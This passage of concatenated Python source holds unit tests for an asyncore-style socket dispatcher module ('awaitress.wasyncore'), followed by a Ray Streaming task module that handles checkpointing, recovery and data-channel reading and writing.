def handle_error(self): # pragma: no cover
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5): # pragma: no cover
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b"x" * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b"\0" * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self): # pragma: no cover
# needs to exist for MacOS testing
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(
sys.platform.startswith("sunos"), "OOB support is broken on Solaris"
)
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll: # pragma: no cover
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(compat.tobytes(chr(244)), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else: # pragma: no cover
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
# self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
# self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
# self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self): # pragma: no cover
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with closewrapper(socket.socket(self.family)) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
@reap_threads
def test_quick_connect(self): # pragma: no cover
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=5))
t.start()
try:
sock = socket.socket(self.family, socket.SOCK_STREAM)
with closewrapper(sock) as s:
s.settimeout(0.2)
s.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0)
)
try:
s.connect(server.address)
except OSError:
pass
finally:
join_thread(t, timeout=TIMEOUT)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(IPV6_ENABLED, "IPv6 support required")
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, "Unix sockets required")
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
class Test__strerror(unittest.TestCase):
def _callFUT(self, err):
from awaitress.wasyncore import _strerror
return _strerror(err)
def test_gardenpath(self):
self.assertEqual(self._callFUT(1), "Operation not permitted")
def test_unknown(self):
self.assertEqual(self._callFUT("wut"), "Unknown error wut")
class Test_read(unittest.TestCase):
def _callFUT(self, dispatcher):
from awaitress.wasyncore import read
return read(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from awaitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
class Test_write(unittest.TestCase):
def _callFUT(self, dispatcher):
from awaitress.wasyncore import write
return write(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from awaitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertTrue(inst.error_handled)
class Test__exception(unittest.TestCase):
def _callFUT(self, dispatcher):
from awaitress.wasyncore import _exception
return _exception(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from awaitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertTrue(inst.error_handled)
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class Test_readwrite(unittest.TestCase):
def _callFUT(self, obj, flags):
from awaitress.wasyncore import readwrite
return readwrite(obj, flags)
def test_handle_read_event(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
def test_handle_write_event(self):
flags = 0
flags |= select.POLLOUT
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.write_event_handled)
def test_handle_expt_event(self):
flags = 0
flags |= select.POLLPRI
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.expt_event_handled)
def test_handle_close(self):
flags = 0
flags |= select.POLLHUP
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.close_handled)
def test_socketerror_not_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.EALREADY, "EALREADY"))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
def test_socketerror_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.ECONNRESET, "ECONNRESET"))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.close_handled)
def test_exception_in_reraised(self):
from awaitress import wasyncore
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(wasyncore.ExitNow)
self.assertRaises(wasyncore.ExitNow, self._callFUT, inst, flags)
self.assertTrue(inst.read_event_handled)
def test_exception_not_in_reraised(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(ValueError)
self._callFUT(inst, flags)
self.assertTrue(inst.error_handled)
class Test_poll(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from awaitress.wasyncore import poll
return poll(timeout, map)
def test_nothing_writable_nothing_readable_but_map_not_empty(self):
# i read the mock.patch docs. nerp.
dummy_time = DummyTime()
map = {0: DummyDispatcher()}
try:
from awaitress import wasyncore
old_time = wasyncore.time
wasyncore.time = dummy_time
result = self._callFUT(map=map)
finally:
wasyncore.time = old_time
self.assertEqual(result, None)
self.assertEqual(dummy_time.sleepvals, [0.0])
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EINTR))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
result = self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(result, None)
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EBADF))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
class Test_poll2(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from awaitress.wasyncore import poll2
return poll2(timeout, map)
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EINTR))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EBADF))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
class Test_dispatcher(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from awaitress.wasyncore import dispatcher
return dispatcher(sock=sock, map=map)
def test_unexpected_getpeername_exc(self):
sock = dummysocket()
def getpeername():
raise socket.error(errno.EBADF)
map = {}
sock.getpeername = getpeername
self.assertRaises(socket.error, self._makeOne, sock=sock, map=map)
self.assertEqual(map, {})
def test___repr__accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
inst.addr = ("localhost", 8080)
result = repr(inst)
expected = "<awaitress.wasyncore.dispatcher listening localhost:8080 at"
self.assertEqual(result[: len(expected)], expected)
def test___repr__connected(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = False
inst.connected = True
inst.addr = ("localhost", 8080)
result = repr(inst)
expected = "<awaitress.wasyncore.dispatcher connected localhost:8080 at"
self.assertEqual(result[: len(expected)], expected)
def test_set_reuse_addr_with_socketerror(self):
sock = dummysocket()
map = {}
def setsockopt(*arg, **kw):
sock.errored = True
raise socket.error
sock.setsockopt = setsockopt
sock.getsockopt = lambda *arg: 0
inst = self._makeOne(sock=sock, map=map)
inst.set_reuse_addr()
self.assertTrue(sock.errored)
def test_connect_raise_socket_error(self):
sock = dummysocket()
map = {}
sock.connect_ex = lambda *arg: 1
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.connect, 0)
def test_accept_raise_TypeError(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise TypeError
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
result = inst.accept()
self.assertEqual(result, None)
def test_accept_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise socket.error(122)
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.accept)
def test_send_raise_EWOULDBLOCK(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(errno.EWOULDBLOCK)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
result = inst.send("a")
self.assertEqual(result, 0)
def test_send_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(122)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.send, "a")
def test_recv_raises_disconnect(self):
sock = dummysocket()
map = {}
def recv(*arg, **kw):
raise socket.error(errno.ECONNRESET)
def handle_close():
inst.close_handled = True
sock.recv = recv
inst = self._makeOne(sock=sock, map=map)
inst.handle_close = handle_close
result = inst.recv(1)
self.assertEqual(result, b"")
self.assertTrue(inst.close_handled)
def test_close_raises_unknown_socket_error(self):
sock = dummysocket()
map = {}
def close():
raise socket.error(122)
sock.close = close
inst = self._makeOne(sock=sock, map=map)
inst.del_channel = lambda: None
self.assertRaises(socket.error, inst.close)
def test_handle_read_event_not_accepting_not_connected_connecting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_connect_event():
inst.connect_event_handled = True
def handle_read():
inst.read_handled = True
inst.handle_connect_event = handle_connect_event
inst.handle_read = handle_read
inst.accepting = False
inst.connected = False
inst.connecting = True
inst.handle_read_event()
self.assertTrue(inst.connect_event_handled)
self.assertTrue(inst.read_handled)
def test_handle_connect_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.handle_connect_event)
def test_handle_expt_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
inst.handle_close = handle_close
inst.handle_expt_event()
self.assertTrue(inst.close_handled)
def test_handle_write_event_while_accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
result = inst.handle_write_event()
self.assertEqual(result, None)
def test_handle_error_gardenpath(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
def compact_traceback(*arg, **kw):
return None, None, None, None
def log_info(self, *arg):
inst.logged_info = arg
inst.handle_close = handle_close
inst.compact_traceback = compact_traceback
inst.log_info = log_info
inst.handle_error()
self.assertTrue(inst.close_handled)
self.assertEqual(inst.logged_info, ("error",))
def test_handle_close(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def log_info(self, *arg):
inst.logged_info = arg
def close():
inst._closed = True
inst.log_info = log_info
inst.close = close
inst.handle_close()
self.assertTrue(inst._closed)
def test_handle_accepted(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.handle_accepted(sock, "1")
self.assertTrue(sock.closed)
class Test_dispatcher_with_send(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from awaitress.wasyncore import dispatcher_with_send
return dispatcher_with_send(sock=sock, map=map)
def test_writable(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.out_buffer = b"123"
inst.connected = True
self.assertTrue(inst.writable())
class Test_close_all(unittest.TestCase):
def _callFUT(self, map=None, ignore_all=False):
from awaitress.wasyncore import close_all
return close_all(map, ignore_all)
def test_socketerror_on_close_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EBADF))
map = {0: disp}
self._callFUT(map)
self.assertEqual(map, {})
def test_socketerror_on_close_non_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EAGAIN))
map = {0: disp}
self.assertRaises(socket.error, self._callFUT, map)
def test_reraised_exc_on_close(self):
disp = DummyDispatcher(exc=KeyboardInterrupt)
map = {0: disp}
self.assertRaises(KeyboardInterrupt, self._callFUT, map)
def test_unknown_exc_on_close(self):
disp = DummyDispatcher(exc=RuntimeError)
map = {0: disp}
self.assertRaises(RuntimeError, self._callFUT, map)
class DummyDispatcher(object):
read_event_handled = False
write_event_handled = False
expt_event_handled = False
error_handled = False
close_handled = False
accepting = False
def __init__(self, exc=None):
self.exc = exc
def handle_read_event(self):
self.read_event_handled = True
if self.exc is not None:
raise self.exc
def handle_write_event(self):
self.write_event_handled = True
if self.exc is not None:
raise self.exc
def handle_expt_event(self):
self.expt_event_handled = True
if self.exc is not None:
raise self.exc
def handle_error(self):
self.error_handled = True
def handle_close(self):
self.close_handled = True
def readable(self):
return False
def writable(self):
return False
def close(self):
if self.exc is not None:
raise self.exc
class DummyTime(object):
def __init__(self):
self.sleepvals = []
def sleep(self, val):
self.sleepvals.append(val)
class DummySelect(object):
error = select.error
def __init__(self, exc=None, pollster=None):
self.selected = []
self.pollster = pollster
self.exc = exc
def select(self, *arg):
self.selected.append(arg)
if self.exc is not None:
raise self.exc
def poll(self):
return self.pollster
class DummyPollster(object):
def __init__(self, exc=None):
self.polled = []
self.exc = exc
def poll(self, timeout):
self.polled.append(timeout)
if self.exc is not None:
raise self.exc
else: # pragma: no cover
return []
|
task.py
|
import logging
import pickle
import threading
import time
import typing
from abc import ABC, abstractmethod
from typing import Optional
from ray.streaming.collector import OutputCollector
from ray.streaming.config import Config
from ray.streaming.context import RuntimeContextImpl
from ray.streaming.generated import remote_call_pb2
from ray.streaming.runtime import serialization
from ray.streaming.runtime.command import WorkerCommitReport
from ray.streaming.runtime.failover import Barrier, OpCheckpointInfo
from ray.streaming.runtime.remote_call import RemoteCallMst
from ray.streaming.runtime.serialization import \
PythonSerializer, CrossLangSerializer
from ray.streaming.runtime.transfer import CheckpointBarrier
from ray.streaming.runtime.transfer import DataMessage
from ray.streaming.runtime.transfer import ChannelID, DataWriter, DataReader
from ray.streaming.runtime.transfer import ChannelRecoverInfo
from ray.streaming.runtime.transfer import ChannelInterruptException
if typing.TYPE_CHECKING:
from ray.streaming.runtime.worker import JobWorker
from ray.streaming.runtime.processor import Processor, SourceProcessor
logger = logging.getLogger(__name__)
class StreamTask(ABC):
"""Base class for all streaming tasks. Each task runs a processor."""
def __init__(self, task_id: int, processor: "Processor",
worker: "JobWorker", last_checkpoint_id: int):
self.worker_context = worker.worker_context
self.vertex_context = worker.execution_vertex_context
self.task_id = task_id
self.processor = processor
self.worker = worker
self.config: dict = worker.config
self.reader: Optional[DataReader] = None
self.writer: Optional[DataWriter] = None
self.is_initial_state = True
self.last_checkpoint_id: int = last_checkpoint_id
self.thread = threading.Thread(target=self.run, daemon=True)
def do_checkpoint(self, checkpoint_id: int, input_points):
logger.info("Start do checkpoint, cp id {}, inputPoints {}.".format(
checkpoint_id, input_points))
output_points = None
if self.writer is not None:
output_points = self.writer.get_output_checkpoints()
operator_checkpoint = self.processor.save_checkpoint()
op_checkpoint_info = OpCheckpointInfo(
operator_checkpoint, input_points, output_points, checkpoint_id)
self.__save_cp_state_and_report(op_checkpoint_info, checkpoint_id)
barrier_pb = remote_call_pb2.Barrier()
barrier_pb.id = checkpoint_id
byte_buffer = barrier_pb.SerializeToString()
if self.writer is not None:
self.writer.broadcast_barrier(checkpoint_id, byte_buffer)
logger.info("Operator checkpoint {} finish.".format(checkpoint_id))
def __save_cp_state_and_report(self, op_checkpoint_info, checkpoint_id):
logger.info(
"Start to save cp state and report, checkpoint id is {}.".format(
checkpoint_id))
self.__save_cp(op_checkpoint_info, checkpoint_id)
self.__report_commit(checkpoint_id)
self.last_checkpoint_id = checkpoint_id
def __save_cp(self, op_checkpoint_info, checkpoint_id):
logger.info("save operator cp, op_checkpoint_info={}".format(
op_checkpoint_info))
cp_bytes = pickle.dumps(op_checkpoint_info)
self.worker.context_backend.put(
self.__gen_op_checkpoint_key(checkpoint_id), cp_bytes)
def __report_commit(self, checkpoint_id: int):
logger.info("Report commit, checkpoint id {}.".format(checkpoint_id))
report = WorkerCommitReport(self.vertex_context.actor_id.binary(),
checkpoint_id)
RemoteCallMst.report_job_worker_commit(self.worker.master_actor,
report)
def clear_expired_cp_state(self, checkpoint_id):
cp_key = self.__gen_op_checkpoint_key(checkpoint_id)
self.worker.context_backend.remove(cp_key)
def clear_expired_queue_msg(self, checkpoint_id):
# clear operator checkpoint
if self.writer is not None:
self.writer.clear_checkpoint(checkpoint_id)
def request_rollback(self, exception_msg: str):
self.worker.request_rollback(exception_msg)
def __gen_op_checkpoint_key(self, checkpoint_id):
op_checkpoint_key = Config.JOB_WORKER_OP_CHECKPOINT_PREFIX_KEY + str(
self.vertex_context.job_name) + "_" + str(
self.vertex_context.exe_vertex_name) + "_" + str(checkpoint_id)
logger.info(
"Generate op checkpoint key {}. ".format(op_checkpoint_key))
return op_checkpoint_key
def prepare_task(self, is_recreate: bool):
logger.info(
"Preparing stream task, is_recreate={}.".format(is_recreate))
channel_conf = dict(self.worker.config)
channel_size = int(
self.worker.config.get(Config.CHANNEL_SIZE,
Config.CHANNEL_SIZE_DEFAULT))
channel_conf[Config.CHANNEL_SIZE] = channel_size
channel_conf[Config.CHANNEL_TYPE] = self.worker.config \
.get(Config.CHANNEL_TYPE, Config.NATIVE_CHANNEL)
execution_vertex_context = self.worker.execution_vertex_context
build_time = execution_vertex_context.build_time
# when using in-memory state, state is lost if the actor throws an exception
op_checkpoint_info = OpCheckpointInfo()
cp_bytes = None
# get operator checkpoint
if is_recreate:
cp_key = self.__gen_op_checkpoint_key(self.last_checkpoint_id)
logger.info("Getting task checkpoints from state, "
"cpKey={}, checkpointId={}.".format(
cp_key, self.last_checkpoint_id))
cp_bytes = self.worker.context_backend.get(cp_key)
if cp_bytes is None:
msg = "Task recover failed, checkpoint is null!"\
"cpKey={}".format(cp_key)
raise RuntimeError(msg)
if cp_bytes is not None:
op_checkpoint_info = pickle.loads(cp_bytes)
self.processor.load_checkpoint(op_checkpoint_info.operator_point)
logger.info("Stream task recover from checkpoint state,"
"checkpoint bytes len={}, checkpointInfo={}.".format(
cp_bytes.__len__(), op_checkpoint_info))
# writers
collectors = []
output_actors_map = {}
for edge in execution_vertex_context.output_execution_edges:
target_task_id = edge.target_execution_vertex_id
target_actor = execution_vertex_context \
.get_target_actor_by_execution_vertex_id(target_task_id)
channel_name = ChannelID.gen_id(self.task_id, target_task_id,
build_time)
output_actors_map[channel_name] = target_actor
if len(output_actors_map) > 0:
channel_str_ids = list(output_actors_map.keys())
target_actors = list(output_actors_map.values())
logger.info("Create DataWriter channel_ids {},"
"target_actors {}, output_points={}.".format(
channel_str_ids, target_actors,
op_checkpoint_info.output_points))
self.writer = DataWriter(channel_str_ids, target_actors,
channel_conf)
logger.info("Create DataWriter succeed channel_ids {}, "
"target_actors {}.".format(channel_str_ids,
target_actors))
for edge in execution_vertex_context.output_execution_edges:
collectors.append(
OutputCollector(self.writer, channel_str_ids,
target_actors, edge.partition))
# readers
input_actor_map = {}
for edge in execution_vertex_context.input_execution_edges:
source_task_id = edge.source_execution_vertex_id
source_actor = execution_vertex_context \
.get_source_actor_by_execution_vertex_id(source_task_id)
channel_name = ChannelID.gen_id(source_task_id, self.task_id,
build_time)
input_actor_map[channel_name] = source_actor
if len(input_actor_map) > 0:
channel_str_ids = list(input_actor_map.keys())
from_actors = list(input_actor_map.values())
logger.info("Create DataReader, channels {},"
"input_actors {}, input_points={}.".format(
channel_str_ids, from_actors,
op_checkpoint_info.input_points))
self.reader = DataReader(channel_str_ids, from_actors,
channel_conf)
def exit_handler():
# Make DataReader stop reading data when the MockQueue destructor
# gets called, to avoid a crash
self.cancel_task()
import atexit
atexit.register(exit_handler)
runtime_context = RuntimeContextImpl(
self.worker.task_id,
execution_vertex_context.execution_vertex.execution_vertex_index,
execution_vertex_context.get_parallelism(),
config=channel_conf,
job_config=channel_conf)
logger.info("open Processor {}".format(self.processor))
self.processor.open(collectors, runtime_context)
# Save the checkpoint immediately, in case failover (FO) happens during
# checkpoint 0, or an old checkpoint would otherwise be reused in a multi-node failover.
self.__save_cp(op_checkpoint_info, self.last_checkpoint_id)
def recover(self, is_recreate: bool):
self.prepare_task(is_recreate)
recover_info = ChannelRecoverInfo()
if self.reader is not None:
recover_info = self.reader.get_channel_recover_info()
self.thread.start()
logger.info("Start operator success.")
return recover_info
@abstractmethod
def run(self):
pass
@abstractmethod
def cancel_task(self):
pass
@abstractmethod
def commit_trigger(self, barrier: Barrier) -> bool:
pass
class InputStreamTask(StreamTask):
"""Base class for stream tasks that execute a
:class:`runtime.processor.OneInputProcessor` or
:class:`runtime.processor.TwoInputProcessor` """
def commit_trigger(self, barrier):
raise RuntimeError(
"commit_trigger is only supported in SourceStreamTask.")
def __init__(self, task_id, processor_instance, worker,
last_checkpoint_id):
super().__init__(task_id, processor_instance, worker,
last_checkpoint_id)
self.running = True
self.stopped = False
self.read_timeout_millis = \
int(worker.config.get(Config.READ_TIMEOUT_MS,
Config.DEFAULT_READ_TIMEOUT_MS))
self.python_serializer = PythonSerializer()
self.cross_lang_serializer = CrossLangSerializer()
def run(self):
logger.info("Input task thread start.")
try:
while self.running:
self.worker.initial_state_lock.acquire()
try:
item = self.reader.read(self.read_timeout_millis)
self.is_initial_state = False
finally:
self.worker.initial_state_lock.release()
if item is None:
continue
if isinstance(item, DataMessage):
msg_data = item.body
type_id = msg_data[0]
if type_id == serialization.PYTHON_TYPE_ID:
msg = self.python_serializer.deserialize(msg_data[1:])
else:
msg = self.cross_lang_serializer.deserialize(
msg_data[1:])
self.processor.process(msg)
